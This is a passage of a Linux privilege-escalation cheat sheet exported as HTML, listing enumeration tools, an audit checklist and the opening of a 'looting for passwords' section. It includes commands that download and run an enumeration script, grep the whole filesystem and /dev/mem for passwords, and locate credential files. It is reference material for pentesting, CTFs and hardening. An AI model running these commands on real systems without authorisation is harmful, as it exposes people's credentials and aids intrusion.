<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Linux - Privilege Escalation</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="88960648-6b6d-4c0d-9a7b-bb58a85d8f32" class="page sans"><header><h1 class="page-title">Linux - Privilege Escalation</h1></header><div class="page-body"><p id="ef4e4b20-fa41-4530-bd36-58ad6e215e92" class="">Summary<div class="indented"><nav id="f36787c7-4e37-4b84-adf0-c2e7445ff9d0" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#dd8c0a14-2cc0-43cf-bffd-ca108b1d092c">Tools</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#70877ccd-f5c7-43f8-adf2-755048ae6943">Checklists</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#d27522c5-ef59-40e4-bc11-ed4c519d2fb7">Looting for passwords</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#a4383ea7-f2fc-4e79-9398-b720306fc3e7">Files containing passwords</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#e88a1f7a-6a7d-4be6-9cd0-ed44ef7d1819">Old passwords in /etc/security/opasswd</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#74c4d967-5253-48fb-ac26-850f516a3f70">Last edited files</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#ff6e2de1-705c-4b53-afca-26731996db47">In memory passwords</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#7ad911ae-2d1f-46b2-b64f-255d8fa3afaa">Find sensitive files</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#bf84969b-def3-4ab1-87b7-16595e410a66">Scheduled tasks</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#fcb00906-254d-4176-b8c3-876df04826e1">Cron jobs</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#9ad88ba2-e49e-42e4-a111-c7abb8a41e00">Systemd timers</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#9afb1625-4648-4e1c-a67b-71bb36dc0d89">SUID</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#ba144fa2-aa3a-4ee1-af47-d9a9128fe779">Find SUID binaries</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#dba073fc-d99f-4e45-8351-cf8be4eecc63">Create a SUID binary</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#14185c86-1418-4d4d-81b6-50fe3cd5f9ee">Capabilities</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#87957410-e20a-4637-a7ed-4b43ecf9870f">List capabilities of binaries</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#805844e3-4dfd-48aa-bb69-93c179bc1ae2">Edit capabilities</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#da451bd8-4748-4675-957e-582d0a485ba0">Interesting capabilities</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#e4dce75d-930a-4cab-8f9a-0c8070d813ea">SUDO</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#f68d1e08-a64a-42c6-8a5f-816556a08591">NOPASSWD</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#9b0f3804-ceaf-4f63-8658-9e7d42d4b989">LD_PRELOAD and NOPASSWD</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#f00008bb-4e32-4572-9df0-81c8a2ae914a">Doas</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#4120397e-8205-4dd6-80cd-6c514263edd9">sudo_inject</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#d48e9ae2-4bf1-4e00-82e0-2035b72e69a1">GTFOBins</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#89177459-a707-4be7-b8b7-4be5d2c60b93">Wildcard</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#92618b38-fa5e-4210-970d-c20fd3ddaeaa">Writable files</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#a05e9194-5115-4e93-9398-4fc1b65d9558">Writable /etc/passwd</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#b24a023c-270f-4029-81ea-402d81ef3d55">Writable /etc/sudoers</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#a060fe4e-ea9e-43a7-bdea-be959228b273">NFS Root Squashing</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#baeb9a35-2c29-4a72-b22a-ef3dda31b722">Shared Library</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#aab85704-bdfa-425a-8c99-1c0b59eded23">ldconfig</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#62f006ff-8ba3-4410-aabc-897e143ba5dc">RPATH</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#4e1e73e2-f5cb-42e8-87f7-7622b0ce5112">Groups</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#beaedb53-cd2a-4309-a400-54e1f9dd7fb7">Docker</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#e162e2bc-058e-4e1e-a3af-6420bd6e7420">LXC/LXD</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#2f5e4456-d214-4d6f-8260-4b7dc1cfd73f">Kernel Exploits</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#a02a018e-f6f3-474e-8441-c949a733b525">CVE-2016-5195 (DirtyCow)</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#d7cf41cd-4522-4da5-a6a5-5e91befa6ef5">CVE-2010-3904 (RDS)</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#03204d98-e538-4a1e-9dd6-97a075a7cf5c">CVE-2010-4258 (Full Nelson)</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#ed4b44a4-2570-4af0-9e9f-31061c364f44">CVE-2012-0056 (Mempodipper)</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#205de242-f026-4538-99ab-cf951b10fe32">References</a></div></nav></div></p><h2 id="dd8c0a14-2cc0-43cf-bffd-ca108b1d092c" class="">Tools</h2><ul id="472aba6a-2c98-46ff-800a-cd6d270990b1" class="bulleted-list"><li><a href="https://github.com/diego-treitos/linux-smart-enumeration">LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs</a><pre id="5d88cfa2-c7ca-404f-9878-1167cb0f0847" class="code"><code>wget &quot;https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh&quot; -O lse.sh
curl &quot;https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh&quot; -o lse.sh
./lse.sh -l1 # shows interesting information that should help you to privesc
./lse.sh -l2 # dump all the information it gathers about the system</code></pre></li></ul><ul id="efbb7e65-a4f8-492c-be16-8ff03b72f2e3" class="bulleted-list"><li><a href="https://github.com/rebootuser/LinEnum">LinEnum - Scripted Local Linux Enumeration &amp; Privilege Escalation Checks</a><pre id="89498548-ce0c-4cc9-a044-0d964caee009" class="code"><code>./LinEnum.sh -s -k keyword -r report -e /tmp/ -t</code></pre></li></ul><ul id="221e07bb-9fbe-40ca-80f7-52aa9194d734" class="bulleted-list"><li><a href="https://github.com/AlessandroZ/BeRoot">BeRoot - Privilege Escalation Project - Windows / Linux / Mac</a></li></ul><ul id="f1ff8b13-d64b-4fa2-a2da-eafbbc2f8bda" class="bulleted-list"><li><a href="https://github.com/sleventyeleven/linuxprivchecker">linuxprivchecker.py - a Linux Privilege Escalation Check Script</a></li></ul><ul id="cdee568a-94c0-4e52-a35a-61ea771a2d7d" class="bulleted-list"><li><a href="https://github.com/pentestmonkey/unix-privesc-check">unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check</a></li></ul><ul id="cbf0da4c-88d0-45a9-a56f-7dc0505b8426" class="bulleted-list"><li><a href="https://github.com/TH3xACE/SUDO_KILLER">Privilege Escalation through sudo - Linux</a></li></ul><h2 id="70877ccd-f5c7-43f8-adf2-755048ae6943" class="">Checklists</h2><ul id="785ec471-9517-47d1-95ba-1752b0b10658" class="bulleted-list"><li>Kernel and distribution release details</li></ul><ul id="5620ab5c-c0c5-4f6b-ada0-3e3bcb298532" class="bulleted-list"><li>System Information:<ul id="56b400e0-4932-4907-97f3-c4336e55b63c" class="bulleted-list"><li>Hostname</li></ul><ul id="57f2cbd1-47f2-404b-a926-df1de710fa85" class="bulleted-list"><li>Networking details:</li></ul><ul id="570ca6cf-8e36-4e18-9f76-87bb5bee966a" class="bulleted-list"><li>Current IP</li></ul><ul id="feec3f46-c9c0-4daf-882d-352f82b714de" class="bulleted-list"><li>Default route details</li></ul><ul id="9a814a63-5708-4cd8-b4d4-d30a5412f905" class="bulleted-list"><li>DNS server information</li></ul></li></ul><ul id="a422afdc-841e-41b1-a894-f176f642405b" class="bulleted-list"><li>User Information:<ul id="e70c656c-14a6-4570-be81-6ff79fab301f" class="bulleted-list"><li>Current user details</li></ul><ul id="0344bdcd-1c57-4c6c-81c1-f602d5fb3bb6" class="bulleted-list"><li>Last logged on users</li></ul><ul id="ace26255-cad7-46ba-b0fb-44dc3a46fc8d" class="bulleted-list"><li>Shows users logged onto the host</li></ul><ul id="0d0a77b3-079e-48fc-82a5-7b49d4bf496b" class="bulleted-list"><li>List all users including uid/gid information</li></ul><ul id="4bbb8c12-d885-4932-910a-4f88d71bc7d8" class="bulleted-list"><li>List root accounts</li></ul><ul id="55daf345-1016-42be-9ed5-580975186ffc" class="bulleted-list"><li>Extracts password policies and hash storage method information</li></ul><ul id="903d04e3-d7c4-4075-a83e-83942aa7ccd6" class="bulleted-list"><li>Checks umask value</li></ul><ul id="98d5bcf1-ee44-4f94-ae37-25b02805bee2" class="bulleted-list"><li>Checks if password hashes are stored in /etc/passwd</li></ul><ul id="0d3b2740-aa18-4cd5-996b-02372f3cfb57" class="bulleted-list"><li>Extract full details for &#x27;default&#x27; uid&#x27;s such as 0, 1000, 1001 etc</li></ul><ul id="894c41e2-6673-489e-84f7-58d0a5493c9c" class="bulleted-list"><li>Attempt to read restricted files i.e. /etc/shadow</li></ul><ul id="4f34852e-0952-4290-b4dc-2bb6e02fdf2a" class="bulleted-list"><li>List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.)</li></ul><ul id="8a71d38d-c980-46f3-8141-b37d1e8a3803" class="bulleted-list"><li>Basic SSH checks</li></ul></li></ul><ul id="819867f5-8ef7-4fc3-b91a-a55bb0a71705" class="bulleted-list"><li>Privileged access:<ul id="13150ad8-f6fb-4bf3-9717-8daff0814350" class="bulleted-list"><li>Which users have recently used sudo</li></ul><ul id="82d8ae20-d71c-4c67-b9b7-e1630d790db5" class="bulleted-list"><li>Determine if /etc/sudoers is accessible</li></ul><ul id="cbc593f5-99f2-4b1b-a05b-ca3115409353" class="bulleted-list"><li>Determine if the current user has Sudo access without a password</li></ul><ul id="b5c8aa15-7d6d-4f9a-825e-0e87265883cd" class="bulleted-list"><li>Are known &#x27;good&#x27; breakout binaries available via Sudo (i.e. nmap, vim etc.)</li></ul><ul id="70e7d077-e7d4-4369-8646-fe7b979592b5" class="bulleted-list"><li>Is root&#x27;s home directory accessible</li></ul><ul id="795cca42-b0df-409c-abc1-fdc05711b5c5" class="bulleted-list"><li>List permissions for /home/</li></ul></li></ul><ul id="d651e0e9-eb2b-4225-a246-40cd9d19e2b9" class="bulleted-list"><li>Environmental:<ul id="516902f2-d716-4975-bb40-4a04e8678599" class="bulleted-list"><li>Display current $PATH</li></ul><ul id="0b28b943-e080-42e4-a0ac-12dc4a2b2308" class="bulleted-list"><li>Displays env information</li></ul></li></ul><ul id="e34f879b-dd22-4c5c-9bb6-8f31d406fc5e" class="bulleted-list"><li>Jobs/Tasks:<ul id="2bde020f-29b2-43c5-8cf3-b15eaa41a84c" class="bulleted-list"><li>List all cron jobs</li></ul><ul id="60291c7b-cd7c-4e09-b25c-42a6ba46e223" class="bulleted-list"><li>Locate all world-writable cron jobs</li></ul><ul id="024b53d0-9e26-4df4-a8cc-994ac4d8cc4e" class="bulleted-list"><li>Locate cron jobs owned by other users of the system</li></ul><ul id="24e128de-7bf6-407c-b140-81ba42ff5551" class="bulleted-list"><li>List the active and inactive systemd timers</li></ul></li></ul><ul id="79600bf4-8a9b-46e5-ab2c-3fc2e85bf1c2" class="bulleted-list"><li>Services:<ul id="69cf1764-b832-422b-ad5d-f2975167e203" class="bulleted-list"><li>List network connections (TCP &amp; UDP)</li></ul><ul id="3f5c63ee-c6fa-4567-917c-73de45641646" class="bulleted-list"><li>List running processes</li></ul><ul id="ed39c75e-a001-45a7-b0e8-e4e7691da644" class="bulleted-list"><li>Lookup and list process binaries and associated permissions</li></ul><ul id="9e0290e0-40f6-450d-a08b-85ff05cbb491" class="bulleted-list"><li>List inetd.conf/xined.conf contents and associated binary file permissions</li></ul><ul id="eadffbb9-be6c-4ca5-975d-8e11a690551b" class="bulleted-list"><li>List init.d binary permissions</li></ul></li></ul><ul id="698706db-e8f6-4b37-9430-75bde741edc5" class="bulleted-list"><li>Version Information (of the following):<ul id="2c8d4c8b-20fb-4485-834b-09bd30c3d214" class="bulleted-list"><li>Sudo</li></ul><ul id="f1f5f018-d107-40e8-bca2-b0565ce6b502" class="bulleted-list"><li>MYSQL</li></ul><ul id="a94f0b63-2b6c-490a-9dc0-fa62539bb041" class="bulleted-list"><li>Postgres</li></ul><ul id="4530a50e-d41f-4f01-a99f-7cbfe5ea7356" class="bulleted-list"><li>Apache<ul id="9c36b663-6c44-4124-ab5a-6504bd459de1" class="bulleted-list"><li>Checks user config</li></ul><ul id="d426985d-bd69-4bce-a709-7340967f684c" class="bulleted-list"><li>Shows enabled modules</li></ul><ul id="ff728cfe-cf12-4e8f-8b9c-573ac6db09e6" class="bulleted-list"><li>Checks for htpasswd files</li></ul><ul id="dc974116-d71e-4d30-83a7-dc4ac628b316" class="bulleted-list"><li>View www directories</li></ul></li></ul></li></ul><ul id="e2a2d479-b6a9-41a4-81a6-32bd94599cfd" class="bulleted-list"><li>Default/Weak Credentials:<ul id="b7570826-a99d-4853-a820-0a9560118183" class="bulleted-list"><li>Checks for default/weak Postgres accounts</li></ul><ul id="cf170c8f-1416-46a9-9f1b-3c45db766dd1" class="bulleted-list"><li>Checks for default/weak MYSQL accounts</li></ul></li></ul><ul id="e601a935-00aa-4052-8604-5f1bb73188b3" class="bulleted-list"><li>Searches:<ul id="2156bd1a-a0d4-414d-8630-04d244d77975" class="bulleted-list"><li>Locate all SUID/GUID files</li></ul><ul id="bdd3c339-33a4-4e94-9993-9aa29215c017" class="bulleted-list"><li>Locate all world-writable SUID/GUID files</li></ul><ul id="f6e84210-8c8d-4fa2-9b9f-cc6b4abe9f6d" class="bulleted-list"><li>Locate all SUID/GUID files owned by root</li></ul><ul id="dab6eb21-a684-4b7d-ad7e-9d063b4cdc0e" class="bulleted-list"><li>Locate &#x27;interesting&#x27; SUID/GUID files (i.e. nmap, vim etc)</li></ul><ul id="be34ad45-5232-4ab9-81bc-801c24717004" class="bulleted-list"><li>Locate files with POSIX capabilities</li></ul><ul id="2e924120-f026-43f8-8735-b2a5f01b8577" class="bulleted-list"><li>List all world-writable files</li></ul><ul id="0f13c8fc-0bc5-4e7e-9b64-322a7a8b6ede" class="bulleted-list"><li>Find/list all accessible *.plan files and display contents</li></ul><ul id="f7f27162-e97b-4474-8b91-adb13fac7cbe" class="bulleted-list"><li>Find/list all accessible *.rhosts files and display contents</li></ul><ul id="aa15534e-49d2-4fbc-b350-45b0c609a566" class="bulleted-list"><li>Show NFS server details</li></ul><ul id="a26b7638-2154-4cda-b7d8-48d8d047f37f" class="bulleted-list"><li>Locate *.conf and *.log files containing keyword supplied at script runtime</li></ul><ul id="c089a76b-0a73-4af3-a433-60bdc35dfb36" class="bulleted-list"><li>List all *.conf files located in /etc</li></ul><ul id="1b50c436-22f4-4478-b775-0f234cc9c743" class="bulleted-list"><li>Locate mail</li></ul></li></ul><ul id="39ea5ef0-71b6-44e7-a316-751425ac4bd8" class="bulleted-list"><li>Platform/software specific tests:<ul id="f6d72a28-6175-47f8-8cb9-37104438dc3c" class="bulleted-list"><li>Checks to determine if we&#x27;re in a Docker container</li></ul><ul id="8e7a3a2a-0026-4b4c-8e7e-43a4118045c5" class="bulleted-list"><li>Checks to see if the host has Docker installed</li></ul><ul id="6973b93f-7502-49a4-9dda-01e0ac5a7826" class="bulleted-list"><li>Checks to determine if we&#x27;re in an LXC container</li></ul></li></ul><h2 id="d27522c5-ef59-40e4-bc11-ed4c519d2fb7" class="">Looting for passwords</h2><h3 id="a4383ea7-f2fc-4e79-9398-b720306fc3e7" class="">Files containing passwords</h3><pre id="af260b50-497e-408c-a2bd-628a32a08fb5" class="code"><code>grep --color=auto -rnw &#x27;/&#x27; -ie &quot;PASSWORD&quot; --color=always 2&gt; /dev/null
find . -type f -exec grep -i -I &quot;PASSWORD&quot; {} /dev/null \;</code></pre><h3 id="e88a1f7a-6a7d-4be6-9cd0-ed44ef7d1819" class="">Old passwords in /etc/security/opasswd</h3><p id="f0120b56-9c95-4047-b354-84456411d8c6" class="">The <code>/etc/security/opasswd</code> file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them.</p><p id="f8668d9d-46d3-4ce3-9e37-1410d2b49bdd" class="">⚠️ Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes</p><h3 id="74c4d967-5253-48fb-ac26-850f516a3f70" class="">Last edited files</h3><p id="cc56ce52-6903-416b-a6d3-35de686007a7" class="">Files that were edited in the last 10 minutes</p><pre id="4ab30ca1-da83-4e4f-b83d-1d3d3dd245e9" class="code"><code>find / -mmin -10 2&gt;/dev/null | grep -Ev &quot;^/proc&quot;</code></pre><h3 id="ff6e2de1-705c-4b53-afca-26731996db47" class="">In memory passwords</h3><pre id="f9c169a8-9d5d-4169-97f1-6a8864e19908" class="code"><code>strings /dev/mem -n10 | grep -i PASS</code></pre><h3 id="7ad911ae-2d1f-46b2-b64f-255d8fa3afaa" class="">Find sensitive files</h3><pre id="b090b82d-9654-4e7d-85a5-e489bfbe3c49" class="code"><code>$ locate password | more           
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
